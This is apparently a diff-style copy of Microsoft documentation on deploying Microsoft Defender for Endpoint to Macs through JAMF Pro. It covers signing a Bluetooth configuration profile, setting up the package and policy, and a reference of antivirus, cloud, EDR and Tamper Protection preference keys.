-Upload downloaded mobileconfig to JAMF Configuration Profiles as described in [Deploying Custom Configuration Profiles using Jamf Pro|Method 2: Upload a Configuration Profile to Jamf Pro](https://www.jamf.com/jamf-nation/articles/648/deploying-custom-configuration-profiles-using-jamf-pro).
-
-## Step 10: Grant Bluetooth Permissions
-
- > [!CAUTION]
- > macOS 14 (Sonoma) contains new privacy enhancements. Beginning with this version, by default, applications cannot access Bluetooth without explicit consent. Microsoft Defender for Endpoint uses it if you configure Bluetooth policies for Device Control.
-
-Download [bluetooth.mobileconfig](https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/bluetooth.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
- > [!WARNING]
- > Current version of JAMF Pro does not support this kind of payload yet. If you upload this mobileconfig as-is, JAMF Pro will remove unsupported payload,
- > and it will fail to apply to client machines. You need to sign downloaded mobileconfig first, after that JAMF Pro will consider it "sealed" and will not
- > tamper with it. See instructions below:
--- You need to have at least one signing certificate installed into your KeyChain, even a self-signed certificate will work. You can inspect what you have with:-
-```bash
-> /usr/bin/security find-identity -p codesigning -v
-
- 1) 70E46A47F552EA8D58521DAC1E7F5144BA3012BC "DevCert"
- 2) 67FC43F3FAB77662BB7688C114585BAA37CA8175 "Mac Developer: John Doe (1234XX234)"
- 3) E142DFD879E5EB60FA249FB5B24CEAE3B370394A "Apple Development: Jane Doe 7XX7778888)"
- 4) 21DE31645BBF1D9F5C46E82E87A6968111E41C75 "Apple Development: me@example.com (8745XX123)"
- 4 valid identities found
-```
--- Choose any of them, and provide the quoted text as the -N parameter:-
-```bash
-/usr/bin/security cms -S -N "DevCert" -i bluetooth.mobileconfig -o bluetooth-signed.mobileconfig
-```
--- Now you can upload the generated bluetooth-signed.mobileconfig to JAMF Pro as described in [Deploying Custom Configuration Profiles using Jamf Pro|Method 2: Upload a Configuration Profile to Jamf Pro](https://www.jamf.com/jamf-nation/articles/648/deploying-custom-configuration-profiles-using-jamf-pro).-
-> [!NOTE]
-> Bluetooth granted through Apple MDM Configuration Profile is not reflected in System Settings => Privacy & Security => Bluetooth.
-
-## Step 11: Schedule scans with Microsoft Defender for Endpoint on macOS
-
-Follow the instructions on [Schedule scans with Microsoft Defender for Endpoint on macOS](/windows/security/threat-protection/microsoft-defender-atp/mac-schedule-scan-atp).
-
-## Step 12: Deploy Microsoft Defender for Endpoint on macOS
-
-> [!NOTE]
-> In the steps that follow, the name of the `.pkg` file and the **Display Name** values are examples. In these examples, `200329` represents the date on which the
-> package and policy were created (in `yymmdd` format), and `v100.86.92` represents the version of the Microsoft Defender application that is being deployed.
-> These values should be updated to conform with the naming convention you use in your environment for Packages and Policies.
-
-1. Navigate to where you saved `wdav.pkg`.
-
- :::image type="content" source="media/8dde76b5463047423f8637c86b05c29d.png" alt-text="The file explorer wdav package." lightbox="media/8dde76b5463047423f8637c86b05c29d.png":::
-
-2. Rename it to `wdav_MDM_Contoso_200329.pkg`.
-
- :::image type="content" source="medim package." lightbox="media/fb2220fed3a530f4b3ef36f600da0c27.png":::
-
-3. Open the Jamf Pro dashboard.
-
- :::image type="content" source="media/990742cd9a15ca9fdd37c9f695d1b9f4.png" alt-text="The configuration settings for jamfpro." lightbox="media/990742cd9a15ca9fdd37c9f695d1b9f4.png":::
-
-4. Select your computer and click the gear icon at the top, then select **Computer Management**.
-
- :::image type="content" source="media/b6d671b2f18b89d96c1c8e2ea1991242.png" alt-text="The configuration settings - computer management." lightbox="media/b6d671b2f18b89d96c1c8e2ea1991242.png":::
-
-5. In **Packages**, select **+ New**.
- :::image type="content" source="media/57aa4d21e2ccc65466bf284701d4e961.png" alt-text="The bird Description for an automatically generated package." lightbox="media/57aa4d21e2ccc65466bf284701d4e961.png":::
-
-6. In the **General tab**, enter the following details in **New Package**:
-
- - Display Name: Leave it blank for now. Because it will be reset when you choose your pkg.
- - Category: None (default)
- - Filename: Choose File
-
- :::image type="content" source="media/21de3658bf58b1b767a17358a3f06341.png" alt-text="The General tab for configuration settings." lightbox="media/21de3658bf58b1b767a17358a3f06341.png":::
-
- Open the file and point it to `wdav.pkg` or `wdav_MDM_Contoso_200329.pkg`.
-
- :::image type="content" source="media/1aa5aaa0a387f4e16ce55b66facc77d1.png" alt-text="The computer screen displaying the description for an automatically generated package." lightbox="media/1aa5aaa0a387f4e16ce55b66facc77d1.png":::
-
-7. Select **Open**. Set the **Display Name** to **Microsoft Defender Advanced Threat Protection and Microsoft Defender Antivirus**.
-
- **Manifest File** is not required. Microsoft Defender for Endpoint works without Manifest File.
-
- **Options tab**: Keep default values.
-
- **Limitations tab**: Keep default values.
-
- :::image type="content" source="media/56dac54634d13b2d3948ab50e8d3ef21.png" alt-text="The limitation tab for the configuration settings." lightbox="media/56dac54634d13b2d3948ab50e8d3ef21.png":::
-
-8. Select **Save**. The package is uploaded to Jamf Pro.
-
- :::image type="content" source="media/33f1ecdc7d4872555418bbc3efe4b7a3.png" alt-text="The configuration settings pack uploading process for the package related to the configuration settings." lightbox="media/33f1ecdc7d4872555418bbc3efe4b7a3.png":::
-
- It can take a few minutes for the package to be available for deployment.
-
- :::image type="content" source="media/1626d138e6309c6e87bfaab64f5ccf7b.png" alt-text="An instance of uploading the package for configuration settings." lightbox="media/1626d138e6309c6e87bfaab64f5ccf7b.png":::
-
-9. Navigate to the **Policies** page.
-
- :::image type="content" source="media/f878f8efa5ebc92d069f4b8f79f62c7f.png" alt-text="The configuration settings policies." lightbox="media/f878f8efa5ebc92d069f4b8f79f62c7f.png":::
-
-10. Select **+ New** to create a new policy.
-
- :::image type="content" source="media/847b70e54ed04787e415f5180414b310.png" alt-text="The configuration settings new policy." lightbox="media/847b70e54ed04787e415f5180414b310.png":::
-
-11. In **General**, enter the Display name **MDATP Onboarding Contoso 200329 v100.86.92 or later**.
-
- :::image type="content" source="mediATP onboard." lightbox="media/625ba6d19e8597f05e4907298a454d28.png":::
-
-12. Select **Recurring Check-in**.
-
- :::image type="content" source="media/68bdbc5754dfc80aa1a024dde0fce7b0.png" alt-text="The recurring check-in for the configuration settings." lightbox="media/68bdbc5754dfc80aa1a024dde0fce7b0.png":::
-
-13. Select **Save**.
-
-14. Select **Packages > Configure**.
-
- :::image type="content" source="media/8fb4cc03721e1efb4a15867d5241ebfb.png" alt-text="The option to configure packages." lightbox="media/8fb4cc03721e1efb4a15867d5241ebfb.png":::
-
-15. Select the **Add** button next to **Microsoft Defender Advanced Threat Protection and Microsoft Defender Antivirus**.
-
- :::image type="content" source="mediA." lightbox="media/526b83fbdbb31265b3d0c1e5fbbdc33a.png":::
-
-16. Select **Save**.
-
- :::image type="content" source="media/9d6e5386e652e00715ff348af72671c6.png" alt-text="The save option for the configuration settings." lightbox="media/9d6e5386e652e00715ff348af72671c6.png":::
-
-17. Create a smart group for machines with Microsoft Defender profiles.
-
- For better user experience, configuration profiles to enrolled machines must be installed before Microsoft Defender's package.
- In most cases JAMF Prof pushes configuration profiles immediately, which policies are executed after some time (i.e. during check-in).
-
- However, in some cases, configuration profiles deployment can be deployed with a significant delay (i.e. if a user's machine is locked).
-
- JAMF Pro provides a way to ensure the correct order.
- You can create a smart group for machines that already received Microsoft Defender's configuration profile, and install Microsoft Defender's package only to those machines (and as soon as they receive this profile!)
-
- To do it, create a smart group first. In the new browser window open **Smart Computers Groups** from the left menu, click **New**.
- Assign some name, switch to the **Criteria** tab, click **Add** and **Show Advanced Criteria**.
-
- Select **Profile Name** as a criterion, and use the name of a previously created configuration profile as Value:
-
- :::image type="content" source="media/ffae2332be230870f865585c84733225.png" alt-text="Creating a smart group." lightbox="media/ffae2332be230870f865585c84733225.png":::
-
- Click **Save**. Return back to the window where you configure a package policy.
-
-18. Select the **Scope** tab.
-
- :::image type="content" source="media/8d80fe378a31143db9be0bacf7ddc5a3.png" alt-text="The Scope tab related to the configuration settings." lightbox="media/8d80fe378a31143db9be0bacf7ddc5a3.png":::
-
-19. Select the target computers.
-
- :::image type="content" source="media/6eda18a64a660fa149575454e54e7156.png" alt-text="The option to add computer groups." lightbox="media/6eda18a64a660fa149575454e54e7156.png":::
-
- Under **Scope**, select **Add**.
-
- :::image type="content" source="media/1c08d097829863778d562c10c5f92b67.png" alt-text="The configuration settings - ad1." lightbox="media/1c08d097829863778d562c10c5f92b67.png":::
-
- Switch to the **Computer Groups** tab. Find the smart group you created, and **Add** it.
-
- :::image type="content" source="media/216253cbfb6ae738b9f13496b9c799fd.png" alt-text="The configuration settings - ad2." lightbox="media/216253cbfb6ae738b9f13496b9c799fd.png":::
-
- Select **Self-Service**, if you want users to install Microsoft Defender voluntarily, on demand.
-
- :::image type="content" source="media/c9f85bba3e96d627fe00fc5a8363b83a.png" alt-text="The Self Service tab for configuration settings." lightbox="media/c9f85bba3e96d627fe00fc5a8363b83a.png":::
-
-20. Select **Done**.
-
- :::image type="content" source="media/99679a7835b0d27d0a222bc3fdaf7f3b.png" alt-text="The Contoso onboarding status with an option to complete it." lightbox="media/99679a7835b0d27d0a222bc3fdaf7f3b.png":::
-
- :::image type="content" source="media/632aaab79ae18d0d2b8e0c16b6ba39e2.png" alt-text="The policies page." lightbox="media/632aaab79ae18d0d2b8e0c16b6ba39e2.png":::
-
-## Configuration profile scope
-
-JAMF requires you to define a set of machines for a configuration profile.
-You need to make sure that all machines receiving Defender's package, also receive *all* configuration profiles listed above.
-
-> [!WARNING]
-> JAMF supports Smart Computer Groups that allow deploying, such as configuration profiles or policies to all machines matching certain criteria evaluated dynamically.
-> It is a powerful concept that is widely used for configuration profiles distribution.
->
-> However, keep in mind that these criteria should not include presence of Defender on a machine.
-> While using this criterion may sound logical, it creates problems that are difficult to diagnose.
->
-> Defender relies on all these profiles at the moment of its installation.
-> Making configuration profiles depending on Defender's presence effectively delays deployment of configuration profiles, and results in an initially unhealthy product and/or prompts for manual approval of certain application permissions, that are otherwise auto approved by profiles.
-
-Deploying a policy with Microsoft Defender's package *after* deploying configuration profiles ensures the end user's best experience, because all required configurations will be applied before the package installs.
security Mac Preferences https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-preferences.md
- Title: Set preferences for Microsoft Defender for Endpoint on Mac
-description: Configure Microsoft Defender for Endpoint on Mac in enterprise organizations.
------- m365-security-- tier3-- mde-macos-- Previously updated : 06/22/2023--
-# Set preferences for Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> [!IMPORTANT]
-> This article contains instructions for how to set preferences for Microsoft Defender for Endpoint on macOS in enterprise organizations. To configure Microsoft Defender for Endpoint on macOS using the command-line interface, see [Resources](mac-resources.md#configuring-from-the-command-line).
-
-## Summary
-
-In enterprise organizations, Microsoft Defender for Endpoint on macOS can be managed through a configuration profile that is deployed by using one of several management tools. Preferences that are managed by your security operations team take precedence over preferences that are set locally on the device. Changing the preferences that are set through the configuration profile requires escalated privileges and isn't available for users without administrative permissions.
-
-This article describes the structure of the configuration profile, includes a recommended profile that you can use to get started, and provides instructions on how to deploy the profile.
-
-## Configuration profile structure
-
-The configuration profile is a *.plist* file that consists of entries identified by a key (which denotes the name of the preference), followed by a value, which depends on the nature of the preference. Values can either be simple (such as a numerical value) or complex, such as a nested list of preferences.
-
-> [!CAUTION]
-> The layout of the configuration profile depends on the management console that you are using. The following sections contain examples of configuration profiles for JAMF and Intune.
-
-The top level of the configuration profile includes product-wide preferences and entries for subareas of Microsoft Defender for Endpoint, which are explained in more detail in the next sections.
-
-### Antivirus engine preferences
-
-The *antivirusEngine* section of the configuration profile is used to manage the preferences of the antivirus component of Microsoft Defender for Endpoint.
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|antivirusEngine|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-#### Enforcement level for antivirus engine
-
-Specifies the enforcement preference of antivirus engine. There are three values for setting enforcement level:
--- Real-time (`real_time`): Real-time protection (scan files as they're accessed) is enabled.-- On-demand (`on_demand`): Files are scanned only on demand. In this:
- - Real-time protection is turned off.
-- Passive (`passive`): Runs the antivirus engine in passive mode. In this:
- - Real-time protection is turned off.
- - On-demand scanning is turned on.
- - Automatic threat remediation is turned off.
- - Security intelligence updates are turned on.
- - Status menu icon is hidden.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|enforcementLevel|
-|**Data type**|String|
-|**Possible values**|real_time (default) <p> on_demand <p> passive|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.10.72 or higher.|
-|||
-
-#### Configure file hash computation feature
-
-Enables or disables file hash computation feature. When this feature is enabled, Defender for Endpoint computes hashes for files it scans to enable better matching against the indicator rules. On macOS, only the script and Mach-O (32 and 64 bit) files are considered for this hash computation (from engine version 1.1.20000.2 or higher). Note that enabling this feature might impact device performance. For more details, please refer to: [Create indicators for files](indicator-file.md).
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|enableFileHashComputation|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|**Comments**|Available in Defender for Endpoint version 101.86.81 or higher.|
-
-#### Run a scan after definitions are updated
-
-Specifies whether to start a process scan after new security intelligence updates are downloaded on the device. Enabling this setting triggers an antivirus scan on the running processes of the device.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|scanAfterDefinitionUpdate|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.41.10 or higher.|
-|||
-
-#### Scan archives (on-demand antivirus scans only)
-
-Specifies whether to scan archives during on-demand antivirus scans.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|scanArchives|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.41.10 or higher.|
-|||
-
-#### Degree of parallelism for on-demand scans
-
-Specifies the degree of parallelism for on-demand scans. This corresponds to the number of threads used to perform the scan and impacts the CPU usage, as well as the duration of the on-demand scan.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|maximumOnDemandScanThreads|
-|**Data type**|Integer|
-|**Possible values**|2 (default). Allowed values are integers between 1 and 64.|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.41.10 or higher.|
-|||
-
-#### Exclusion merge policy
-
-Specify the merge policy for exclusions. This can be a combination of administrator-defined and user-defined exclusions (`merge`), or only administrator-defined exclusions (`admin_only`). This setting can be used to restrict local users from defining their own exclusions.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|exclusionsMergePolicy|
-|**Data type**|String|
-|**Possible values**|merge (default) <p> admin_only|
-|**Comments**|Available in Microsoft Defender for Endpoint version 100.83.73 or higher.|
-|||
-
-#### Scan exclusions
-
-Specify entities excluded from being scanned. Exclusions can be specified by full paths, extensions, or file names.
-(Exclusions are specified as an array of items, administrator can specify as many elements as necessary, in any order.)
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|exclusions|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-##### Type of exclusion
-
-Specify content excluded from being scanned by type.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|$type|
-|**Data type**|String|
-|**Possible values**|excludedPath <p> excludedFileExtension <p> excludedFileName|
-|||
-
-##### Path to excluded content
-
-Specify content excluded from being scanned by full file path.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|path|
-|**Data type**|String|
-|**Possible values**|valid paths|
-|**Comments**|Applicable only if *$type* is *excludedPath*|
-|||
-
-## Supported exclusion types
-
-The following table shows the exclusion types supported by Defender for Endpoint on Mac.
-
-<br>
-
-****
-
-|Exclusion|Definition|Examples|
-||||
-|File extension|All files with the extension, anywhere on the device|`.test`|
-|File|A specific file identified by the full path|`/var/log/test.log` <p> `/var/log/*.log` <p> `/var/log/install.?.log`|
-|Folder|All files under the specified folder (recursively)|`/var/log/` <p> `/var/*/`|
-|Process|A specific process (specified either by the full path or file name) and all files opened by it|`/bin/cat` <p> `cat` <p> `c?t`|
-||||
-
-> [!IMPORTANT]
-> The paths above must be hard links, not symbolic links, in order to be successfully excluded. You can check if a path is a symbolic link by running `file <path-name>`.
-
-File, folder, and process exclusions support the following wildcards:
-
-<br>
-
-****
-
-|Wildcard|Description|Example|Matches|Doesn't match|
-||||||
-|\*|Matches any number of any characters including none (note that when this wildcard is used inside a path it will substitute only one folder)|`/var/\*/\*.log`|`/var/log/system.log`|`/var/log/nested/system.log`|
-|?|Matches any single character|`file?.log`|`file1.log` <p> `file2.log`|`file123.log`|
-||||||
-
-### Path type (file / directory)
-
-Indicate if the *path* property refers to a file or directory.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|isDirectory|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|**Comments**|Applicable only if *$type* is *excludedPath*|
-|||
-
-### File extension excluded from the scan
-
-Specify content excluded from being scanned by file extension.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|extension|
-|**Data type**|String|
-|**Possible values**|valid file extensions|
-|**Comments**|Applicable only if *$type* is *excludedFileExtension*|
-|||
-
-### Process excluded from the scan
-
-Specify a process for which all file activity is excluded from scanning. The process can be specified either by its name (for example, `cat`) or full path (for example, `/bin/cat`).
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|name|
-|**Data type**|String|
-|**Possible values**|any string|
-|**Comments**|Applicable only if *$type* is *excludedFileName*|
-|||
-
-#### Allowed threats
-
-Specify threats by name that aren't blocked by Defender for Endpoint on Mac. These threats will be allowed to run.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|allowedThreats|
-|**Data type**|Array of strings|
-|||
-
-#### Disallowed threat actions
-
-Restricts the actions that the local user of a device can take when threats are detected. The actions included in this list aren't displayed in the user interface.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|disallowedThreatActions|
-|**Data type**|Array of strings|
-|**Possible values**|allow (restricts users from allowing threats) <p> restore (restricts users from restoring threats from the quarantine)|
-|**Comments**|Available in Microsoft Defender for Endpoint version 100.83.73 or higher.|
-|||
-
-#### Threat type settings
-
-Specify how certain threat types are handled by Microsoft Defender for Endpoint on macOS.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|threatTypeSettings|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-##### Threat type
-
-Specify threat types.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|key|
-|**Data type**|String|
-|**Possible values**|potentially_unwanted_application <p> archive_bomb|
-|||
-
-##### Action to take
-
-Specify what action to take when a threat of the type specified in the preceding section is detected. Choose from the following options:
--- **Audit**: your device isn't protected against this type of threat, but an entry about the threat is logged.-- **Block**: your device is protected against this type of threat and you're notified in the user interface and the security console.-- **Off**: your device isn't protected against this type of threat and nothing is logged.-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|value|
-|**Data type**|String|
-|**Possible values**|audit (default) <p> block <p> off|
-|||
-
-#### Threat type settings merge policy
-
-Specify the merge policy for threat type settings. This can be a combination of administrator-defined and user-defined settings (`merge`) or only administrator-defined settings (`admin_only`). This setting can be used to restrict local users from defining their own settings for different threat types.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|threatTypeSettingsMergePolicy|
-|**Data type**|String|
-|**Possible values**|merge (default) <p> admin_only|
-|**Comments**|Available in Microsoft Defender for Endpoint version 100.83.73 or higher.|
-|||
-
-#### Antivirus scan history retention (in days)
-
-Specify the number of days that results are retained in the scan history on the device. Old scan results are removed from the history. Old quarantined files that are also removed from the disk.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|scanResultsRetentionDays|
-|**Data type**|String|
-|**Possible values**|90 (default). Allowed values are from 1 day to 180 days.|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.07.23 or higher.|
-|||
-
-#### Maximum number of items in the antivirus scan history
-
-Specify the maximum number of entries to keep in the scan history. Entries include all on-demand scans performed in the past and all antivirus detections.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|scanHistoryMaximumItems|
-|**Data type**|String|
-|**Possible values**|10000 (default). Allowed values are from 5000 items to 15000 items.|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.07.23 or higher.|
-|||
-
-### Cloud-delivered protection preferences
-
-Configure the cloud-driven protection features of Microsoft Defender for Endpoint on macOS.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|cloudService|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-#### Enable / disable cloud-delivered protection
-
-Specify whether to enable cloud-delivered protection the device or not. To improve the security of your services, we recommend keeping this feature turned on.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|enabled|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|||
-
-#### Diagnostic collection level
-
-Diagnostic data is used to keep Microsoft Defender for Endpoint secure and up to date, detect, diagnose and fix problems, and also make product improvements. This setting determines the level of diagnostics sent by Microsoft Defender for Endpoint to Microsoft.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|diagnosticLevel|
-|**Data type**|String|
-|**Possible values**|optional (default) <p> required|
-|||
-
-#### Configure cloud block level
-
-This setting determines how aggressive Defender for Endpoint will be in blocking and scanning suspicious files. If this setting is on, Defender for Endpoint will be more aggressive when identifying suspicious files to block and scan; otherwise, it will be less aggressive and therefore block and scan with less frequency. There are five values for setting cloud block level:
--- Normal (`normal`): The default blocking level.-- Moderate (`moderate`): Delivers verdict only for high confidence detections.-- High (`high`): Aggressively blocks unknown files while optimizing for performance (greater chance of blocking non-harmful files).-- High Plus (`high_plus`): Aggressively blocks unknown files and applies additional protection measures (might impact client device performance).-- Zero Tolerance (`zero_tolerance`): Blocks all unknown programs.-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|cloudBlockLevel|
-|**Data type**|String|
-|**Possible values**|normal (default) <p> moderate <p> high <p> high_plus <p> zero_tolerance|
-|**Comments**|Available in Defender for Endpoint version 101.56.62 or higher.|
-
-#### Enable / disable automatic sample submissions
-
-Determines whether suspicious samples (that are likely to contain threats) are sent to Microsoft. You're prompted if the submitted file is likely to contain personal information.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|automaticSampleSubmission|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|||
-
-#### Enable / disable automatic security intelligence updates
-
-Determines whether security intelligence updates are installed automatically:
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Key**|automaticDefinitionUpdateEnabled|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|||
-
-### User interface preferences
-
-Manage the preferences for the user interface of Microsoft Defender for Endpoint on macOS.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|userInterface|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-#### Show / hide status menu icon
-
-Specify whether to show or hide the status menu icon in the top-right corner of the screen.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|hideStatusMenuIcon|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|||
-
-#### Show / hide option to send feedback
-
-Specify whether users can submit feedback to Microsoft by going to `Help` > `Send Feedback`.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|userInitiatedFeedback|
-|**Data type**|String|
-|**Possible values**|enabled (default) <p> disabled|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.19.61 or higher.|
-|||
---
-#### Control sign-in to consumer version of Microsoft Defender
-
-Specify whether users can sign into the consumer version of Microsoft Defender.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|consumerExperience|
-|**Data type**|String|
-|**Possible values**|enabled (default) <p> disabled|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.60.18 or higher.|
-|||
--
-### Endpoint detection and response preferences
-
-Manage the preferences of the endpoint detection and response (EDR) component of Microsoft Defender for Endpoint on macOS.
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|edr|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-#### Device tags
-
-Specify a tag name and its value.
--- The GROUP tag marks the device with the specified value. The tag is reflected in the portal under the device page and can be used for filtering and grouping devices.-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|tags|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-##### Type of tag
-
-Specifies the type of tag
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|key|
-|**Data type**|String|
-|**Possible values**|`GROUP`|
-|||
-
-##### Value of tag
-
-Specifies the value of tag
-
-<br>
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|value|
-|**Data type**|String|
-|**Possible values**|any string|
-|||
-
-> [!IMPORTANT]
->
-> - Only one value per tag type can be set.
-> - Type of tags are unique, and should not be repeated in the same configuration profile.
-
-#### Group identifier
-
-EDR Group identifiers
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|groupIds|
-|**Data type**|String|
-|**Comments**|Group identifier|
-|||
-
-### Tamper Protection
-
-Manage the preferences of the Tamper Protection component of Microsoft Defender for Endpoint on macOS.
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|tamperProtection|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-#### Enforcement level
-
-If Tamper Protection is enabled and if it is in the strict mode
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|enforcementLevel|
-|**Data type**|String|
-|**Comments**|One of 'disabled', 'audit', or 'block'|
-|||
-
-Possible values:
--- disabled - Tamper Protection is turned off, no prevention of attacks or reporting to the Cloud-- audit - Tamper Protection reports tampering attempts to the Cloud only, but does not block them-- block - Tamper Protection both blocks and reports attacks to the Cloud-
-#### Exclusions
-
-Defines processes that are allowed altering Microsoft Defender's asset, without being considering tampering.
-Either path, or teamId, or signingId, or their combination must be provided.
-Args can be provided additionally, to specify allowed process more precisely.
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|exclusions|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-|||
-
-##### Path
-
-Exact path of the process executable.
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|path|
-|**Data type**|String|
-|**Comments**| In case of a shell script it will be the exact path to the interpreter binary, e.g. `/bin/zsh`. No wildcards allowed. |
-|||
-
-##### Team Id
-
-Apple's "Team Id" of the vendor.
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|teamId|
-|**Data type**|String|
-|**Comments**| For example, `UBF8T346G9` for Microsoft |
-|||
-
-##### Signing Id
-
-Apple's "Signing Id" of the package.
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|signingId|
-|**Data type**|String|
-|**Comments**| For example, `com.apple.ruby` for Ruby interpreter |
-|||
-
-##### Process arguments
-
-Used in combination with other parameters to identify the process.
-
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.wdav`|
-|**Key**|signingId|
-|**Data type**|Array of strings|
-|**Comments**| If specified, process argument must match those arguments exactly, case-sensitive |
-|||
-
-## Recommended configuration profile
-
-To get started, we recommend the following configuration for your enterprise to take advantage of all protection features that Microsoft Defender for Endpoint provides.
-
-The following configuration profile (or, in case of JAMF, a property list that could be uploaded into the custom settings configuration profile) will:
--- Enable real-time protection (RTP)-- Specify how the following threat types are handled:
- - **Potentially unwanted applications (PUA)** are blocked
- - **Archive bombs** (file with a high compression rate) are audited to Microsoft Defender for Endpoint logs
